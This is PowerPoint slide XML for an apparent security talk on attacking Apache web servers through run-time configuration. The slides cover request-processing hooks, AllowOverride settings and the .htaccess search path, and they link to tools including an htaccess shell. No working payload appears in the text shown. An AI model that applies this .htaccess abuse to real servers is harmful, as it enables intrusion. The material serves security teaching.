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74"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="288" r:id="rId4"/>
    <p:sldId id="290" r:id="rId5"/>
    <p:sldId id="319" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="327" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="287" r:id="rId11"/>
    <p:sldId id="357" r:id="rId12"/>
    <p:sldId id="295" r:id="rId13"/>
    <p:sldId id="358" r:id="rId14"/>
    <p:sldId id="310" r:id="rId15"/>
    <p:sldId id="343" r:id="rId16"/>
    <p:sldId id="344" r:id="rId17"/>
    <p:sldId id="335" r:id="rId18"/>
    <p:sldId id="345" r:id="rId19"/>
    <p:sldId id="311" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="356" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="323" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="289" r:id="rId27"/>
    <p:sldId id="309" r:id="rId28"/>
    <p:sldId id="314" r:id="rId29"/>
    <p:sldId id="315" r:id="rId30"/>
    <p:sldId id="316" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="331" r:id="rId33"/>
    <p:sldId id="332" r:id="rId34"/>
    <p:sldId id="297" r:id="rId35"/>
    <p:sldId id="355" r:id="rId36"/>
    <p:sldId id="347" r:id="rId37"/>
    <p:sldId id="348" r:id="rId38"/>
    <p:sldId id="313" r:id="rId39"/>
    <p:sldId id="293" r:id="rId40"/>
    <p:sldId id="298" r:id="rId41"/>
    <p:sldId id="346" r:id="rId42"/>
    <p:sldId id="354" r:id="rId43"/>
    <p:sldId id="361" r:id="rId44"/>
    <p:sldId id="364" r:id="rId45"/>
    <p:sldId id="362" r:id="rId46"/>
    <p:sldId id="365" r:id="rId47"/>
    <p:sldId id="363" r:id="rId48"/>
    <p:sldId id="308" r:id="rId49"/>
    <p:sldId id="306" r:id="rId50"/>
    <p:sldId id="300" r:id="rId51"/>
    <p:sldId id="301" r:id="rId52"/>
    <p:sldId id="349" r:id="rId53"/>
    <p:sldId id="359" r:id="rId54"/>
    <p:sldId id="360" r:id="rId55"/>
    <p:sldId id="294" r:id="rId56"/>
    <p:sldId id="299" r:id="rId57"/>
    <p:sldId id="333" r:id="rId58"/>
    <p:sldId id="351" r:id="rId59"/>
    <p:sldId id="305" r:id="rId60"/>
    <p:sldId id="350" r:id="rId61"/>
    <p:sldId id="337" r:id="rId62"/>
    <p:sldId id="329" r:id="rId63"/>
    <p:sldId id="339" r:id="rId64"/>
    <p:sldId id="340" r:id="rId65"/>
    <p:sldId id="341" r:id="rId66"/>
    <p:sldId id="342" r:id="rId67"/>
    <p:sldId id="318" r:id="rId68"/>
    <p:sldId id="338" r:id="rId69"/>
    <p:sldId id="302" r:id="rId70"/>
    <p:sldId id="352" r:id="rId71"/>
    <p:sldId id="330" r:id="rId72"/>
    <p:sldId id="280" r:id="rId73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75"/>
      <p:bold r:id="rId76"/>
      <p:italic r:id="rId77"/>
      <p:boldItalic r:id="rId78"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Muli" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId79"/>
      <p:bold r:id="rId80"/>
      <p:italic r:id="rId81"/>
      <p:boldItalic r:id="rId82"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nixie One" panose="02000503080000020004" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId8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B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B8D91D-2929-4886-81B1-9E7EC0E3FEB4}">
  <a:tblStyle styleId="{34B8D91D-2929-4886-81B1-9E7EC0E3FE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56059"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="10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6.fntdata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551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433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Modules can hook the various processing stages using these hooks, although this is generally not important for run time configuration based attacks.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7169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2382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192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094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This is the permission that needs to be set for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>AllowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> in order to be able to use these directives..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5341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90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167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Give examples for each thing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5924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89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71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9370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825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4730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3996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85940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7184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464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761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367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35891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5725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9420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59531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another set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rules that are better, but again, they only detect basic PHP shells…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41917580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975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9875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3570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71972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3921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4948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822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926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26827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7629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9309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78934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83996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Make sure this is true… redirect attack perhaps?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Proxy attacks?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18214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74460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9294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2274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4004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05611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34146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0232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4204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4483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8317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72355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0321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975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6093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3095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90783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810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80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761">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C891EBDC-9023-B44D-9395-DC4F478A197A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3191134" y="148310"/>
            <a:ext cx="323200" cy="323183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Shape 60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761">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FDF5827-2C3F-2648-B648-8A356184BF16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330072" y="3327896"/>
            <a:ext cx="323200" cy="323183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BBD5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1" name="Shape 91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0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41" name="Shape 718">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2150A889-8D80-C84A-8EB8-13439B01655B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="614819" y="2221840"/>
            <a:ext cx="904112" cy="668896"/>
            <a:chOff x="5255200" y="3006475"/>
            <a:chExt cx="511700" cy="378575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 719">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16F5CFCF-6465-A04F-86FA-C0F80EEBD525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720">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8E89A2-CC89-F249-BB0E-C1687D3377F0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Shape 761">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F28D061-9DF6-5D44-8A6F-FB75A0782839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142850" y="2978295"/>
            <a:ext cx="323200" cy="323183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Shape 761">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C52050A-91DD-AE47-B3D6-1A8CBC1ACC05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124524" y="1252433"/>
            <a:ext cx="323200" cy="323183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Shape 214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Shape 238"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"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0" name="Shape 240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Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"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" name="Shape 25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58" name="Shape 25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Shape 262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Shape 26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68" name="Shape 26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Shape 274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Shape 718">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5916BC-2123-6244-93D7-406ADE479B01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="613901" y="481935"/>
            <a:ext cx="904112" cy="668896"/>
            <a:chOff x="5255200" y="3006475"/>
            <a:chExt cx="511700" cy="378575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 719">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960ACE42-C8F8-A94A-B262-F5FD4834D461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720">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ACB03F5-BA41-B54F-BA0D-580F07D0DBE5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d.apache.org/docs/2.4/developer/request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stanotherhacker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2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks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reghoul/lbmap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tomolivercv.wordpress.com/2011/07/24/protect-your-uploads-folder-with-htaccess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seclists.org/fulldisclosure/2015/Feb/60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reghoul/htshell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nazdrowie.justanotherhacker.com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017917" y="1914188"/>
            <a:ext cx="7407245" cy="9756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Attacking Web Servers</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 329">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2CFE6D-C70A-FE4E-9484-B24623F65857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1017916" y="2480656"/>
            <a:ext cx="7407245" cy="97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AU" sz="4000" dirty="0"/>
              <a:t>via run time configuration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197EAE-6B76-624F-8500-679640F45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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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Apache internals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A495D-9317-C84F-9DCD-899562126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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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206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8C78-160F-6048-92E6-30D605EB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821200"/>
            <a:ext cx="5721985" cy="645300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 2" descr="http://www.apachetutor.org/dev/request-1.gif">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F081A9-4A03-E845-A0B3-0A322B63D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DAEAD2C3-B5C3-6D48-8C36-A4C4922D9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1956" y="1610604"/>
            <a:ext cx="2227092" cy="2227092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="EarthGlobeAmericas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76568A5-3CB7-0540-8F92-884AB9313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9487" y="1774489"/>
            <a:ext cx="1899321" cy="189932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D4EBA0-6D69-024D-AB61-7D06941C539B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2728671" y="2371238"/>
            <a:ext cx="3052198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5C859B-3F02-994A-B35B-5AEDBE0A45C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2728671" y="2988587"/>
            <a:ext cx="3052198" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100"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38DFE0-FE8F-B94A-8F98-69D948B3347A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829012" y="2055432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9BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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3A04C-B848-9643-8E86-57A8D053EE78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759281" y="3025433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9BBD5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777317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699" y="1735600"/>
            <a:ext cx="5443015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Request processing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Request processing cycle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Request  parsing phase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Security phase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Preparation phase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Handler phase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AU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5F51AE-0F83-BB4A-A82B-D7940CB23D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867186" y="4126773"/>
            <a:ext cx="4708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9BBD5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://httpd.apache.org/docs/2.4/developer/request.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5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1374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801C9B-EE3A-5A47-BA38-B1D17F9E373C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594888" y="0"/>
            <a:ext cx="0" cy="514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C7C69B-7EED-AC46-B8BA-634CB78BCAE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92991" y="2247256"/>
            <a:ext cx="80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9BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept request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9958FA-9266-9447-A62B-B6959BD4AC1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898903" y="2508866"/>
            <a:ext cx="7113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706F567-B42D-574F-BED7-EDB66B8E383E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8012625" y="2247256"/>
            <a:ext cx="117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9BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Processing Axis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C4058A-F74A-6046-9334-6FA8C0D6165F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991892" y="2308318"/>
            <a:ext cx="960895" cy="4010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11D8934-0959-B64D-ABCB-8ACE8F17E059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138766" y="2308317"/>
            <a:ext cx="960895" cy="4010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4CA44B-FD85-F542-B61A-4D4504697367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285640" y="2322884"/>
            <a:ext cx="960895" cy="4010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B53168-2C5A-0846-BD59-4A2246A8DF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974957" y="2247255"/>
            <a:ext cx="1239857" cy="523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Generator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5E2719-6828-9C4D-8A9B-10A52DDFFF7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627322" y="3192651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9BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preliminary processing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33DA55-65ED-2D48-A79F-20435C79624E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627322" y="2571750"/>
            <a:ext cx="325465" cy="620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4CC79B-A6C3-F042-8058-44F16530B861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619213" y="2571750"/>
            <a:ext cx="6139" cy="620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CD4143-82F8-2E44-A8E0-CEB2438016D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3243827" y="2571750"/>
            <a:ext cx="454779" cy="620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98BEF00-B00A-6D43-9E3D-CB120D3DFBD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5114437" y="399443"/>
            <a:ext cx="960895" cy="4010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3DCA8AB-D354-7E41-B2E7-E0178BA0FAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5114436" y="1162376"/>
            <a:ext cx="960895" cy="4010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59FDAA-A152-8642-9CB9-B184F012A8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5114435" y="3299880"/>
            <a:ext cx="960895" cy="4010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D79FF8-8F0C-9D41-8D7A-BCC4753D668D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5114434" y="4029831"/>
            <a:ext cx="960895" cy="4010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771EBC0-B48F-BB40-A2E2-78BA0AF27C08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842861" y="599990"/>
            <a:ext cx="898902" cy="31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7B3EB1-3C55-4146-94B0-18F97A89E901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5866101" y="1095129"/>
            <a:ext cx="875662" cy="267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A4A69A-7B29-8B4F-BA6B-254A0DE6D22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5866101" y="3500427"/>
            <a:ext cx="829160" cy="20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8D795D-32EC-BB43-B295-CCC6F6899546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5866101" y="3883625"/>
            <a:ext cx="829159" cy="333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0F8EAE-0050-934F-9D6A-87A1D7888C48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741763" y="740528"/>
            <a:ext cx="902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9BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output Filters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855C0E-27A6-4845-BF5B-864549466A22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741763" y="3539230"/>
            <a:ext cx="902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9BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input Filters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44C291-D825-2B44-99B7-FFAAF1C93EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377725" y="478918"/>
            <a:ext cx="340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19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request Processing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131471-C918-DF42-90F0-0CABB97F81D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633272" y="2322884"/>
            <a:ext cx="960895" cy="4010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4046573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Hooks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dirty="0" err="1"/>
              <a:t>map_to_storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>header_parser</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>type_checker</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>fixups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>insert_filter</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU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AU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771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503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365FF4-A8D6-8041-8DD8-6BF006093E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387927" y="346364"/>
            <a:ext cx="2978728" cy="665018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="19B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6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Server config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Virtual host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Directory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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess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3012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Override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 err="1"/>
              <a:t>AuthConfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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 err="1"/>
              <a:t>FileInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Indexes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Limit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Options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928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Lookup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URL: http://host/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>image.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Webroot: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>/www/html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 dirty="0"/>
              <a:t>Search path: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/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>/www/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>/www/html/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>/www/html/uploads/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess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23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/>
              <a:t>Hello!</a:t>
            </a:r>
            <a:endParaRPr sz="12000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286467" y="2400250"/>
            <a:ext cx="4953765" cy="2363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Eldar Marcussen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Security researcher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Penetration tester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Trainer</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wireghoul</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0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rgbClr val="19BBD5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.justanotherhacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="344" name="Shape 34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976393" y="677875"/>
            <a:ext cx="1763057" cy="1693800"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 28393"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst>
          </a:prstGeom>
